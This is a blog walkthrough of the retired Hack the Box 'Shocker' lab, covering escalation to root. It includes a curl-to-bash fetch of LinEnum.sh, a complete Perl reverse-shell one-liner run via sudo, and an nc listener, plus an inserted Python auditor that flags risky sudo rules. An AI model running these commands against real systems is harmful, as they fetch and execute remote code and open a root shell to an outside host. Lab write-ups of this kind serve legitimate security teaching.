Hack the Box – Shocker – Part 2 (System Flag)
# Information:
Platform Name: Hack the Box
Machine Challenge: Shocker
Machine Status: Retired
Machine Matrix:
- Enum: 5.5
- CTF: 5.1
- Custom: 3.7
- CVE: 6.3
- Real: 4.9
Challenge Level: Easy
Part 2: System Flag
Note: This is the continuation of Hack the Box – Shocker – Part 1 (User Flag). Take a look at the first part!
# Writeup: (Continuation)
Step 1
Okay, we now have access to the terminal of the Shocker machine, but we cannot yet access it as root. After trying to change directory to /root I got: “Permission denied”.
We need a way to escalate privileges and get to root. One tool that helps find such a way is LinEnum.sh.
According to DRD_ at Null Byte: LinEnum is a tool used to Identify Potential Privilege Escalation Vectors.
To be able to run LinEnum and see the results, we need to create an HTTP server on our machine. To do so, I used Python's SimpleHTTPServer module; see the command below:
mregra on Cyber:VM/HTB/Shocker $ python -m SimpleHTTPServer 7777
After starting the HTTP server we can go back to the remote terminal of the Shocker machine and run the command:
shelly@Shocker:/usr/lib/cgi-bin$ curl 10.10.14.26:7777/LinEnum.sh | bash
Which returns a long output, like so:
After analyzing the output I was able to find this:
It seems we can run perl commands and files as root without a password! This is our way in!
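Seen from the defender's side, this finding is a sudo rule that lets an unprivileged account run an interpreter as root with no password. The added example below (not part of the original post) parses `sudo -l`-style output and flags such rules; the sample output, the user and host names, and the interpreter list are constructed assumptions.

```python
import re

# Assumption: a short, non-exhaustive list of programs that can execute
# arbitrary code, so a sudo rule for one of them amounts to full root access.
CODE_EXECUTING = {"perl", "python", "ruby", "bash", "sh", "awk", "vim", "find"}

# One rule line of `sudo -l` output, e.g. "(root) NOPASSWD: /usr/bin/perl".
RULE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

# Constructed sample output (not captured from the Shocker machine).
SAMPLE = """\
Matching Defaults entries for alice on host1:
    env_reset, mail_badpass

User alice may run the following commands on host1:
    (root) NOPASSWD: /usr/bin/perl
    (root) /usr/bin/systemctl restart nginx, /usr/bin/python3
    (www-data) NOPASSWD: /usr/bin/perl
"""


def audit_sudo_listing(text):
    """Return one finding per rule that lets the user run code as root."""
    findings = []
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # headers, Defaults entries, blank lines
        runas_users = re.split(r"\s*,\s*", m.group("runas").split(":")[0].strip())
        if not {"root", "ALL"} & set(runas_users):
            continue  # rule cannot be used to become root
        nopasswd = "NOPASSWD" in re.findall(r"[A-Z_]+", m.group("tags"))
        for cmd in re.split(r",\s*", m.group("cmds")):
            parts = cmd.split()
            if not parts:
                continue
            program = parts[0]
            # Drop the directory and any version suffix (python3, perl5.22).
            name = re.sub(r"[\d.]+$", "", program.rsplit("/", 1)[-1])
            if program == "ALL" or name in CODE_EXECUTING:
                findings.append({"program": program, "nopasswd": nopasswd,
                                 "severity": "critical" if nopasswd else "high"})
    return findings


if __name__ == "__main__":
    for finding in audit_sudo_listing(SAMPLE):
        print(finding)
```

Feed it the output of `sudo -l -U <user>` for each account; a critical finding means the rule should be removed or narrowed to a fixed, root-owned script.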
Step 2
Now we need to create a root reverse shell. To do so, let's go back to the Pentestmonkey website and get the Perl script.
After getting the script, I opened a text editor on my VM and pasted the Perl script there. I went back to the Shocker remote terminal and ran sudo -l to discover the full path for perl, which was /usr/bin/perl.
Now, let’s go back to the text editor and let’s edit the perl command. The final command:
sudo /usr/bin/perl -e 'use Socket;$i="10.10.14.26";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
10.10.14.26 is my VM's IP; you should change that IP to yours.
As you can see, the port I chose was the one that was already there, 1234.
Once the command was configured to our specific case I went back to my VM’s terminal and executed the command:
mregra on Cyber:VM/HTB/Shocker $ nc -lvnp 1234
This command, as you know from the previous Shocker post, starts a TCP server on port 1234.
Once this was finished, I went back to the Shocker remote terminal and ran the perl command that I previously configured:
As you can see, after running whoami we get “root”. We succeeded in escalating to root!
After some searching I was able to find the flag at /root/root.txt
Thank you very much for reading!
Cheers,
MRegra
Does your site have a contact page? I’m having problems locating it
but, I’d like to shoot you an email. I’ve got some creative ideas for your blog you might
be interested in hearing. Either way, great blog and I look forward to seeing it develop
over time.
Hello, the contact page can be found here: https://mregraoncyber.com/contact/
Thanks for reading and glad you enjoyed.
Have a nice day!
I know this is off topic but I’m looking into starting my own blog and was curious
what all is needed to get set up? I’m assuming having a blog like yours would cost a pretty penny?
I’m not very internet smart so I’m not 100% sure.
Any suggestions or advice would be greatly appreciated.
Appreciate it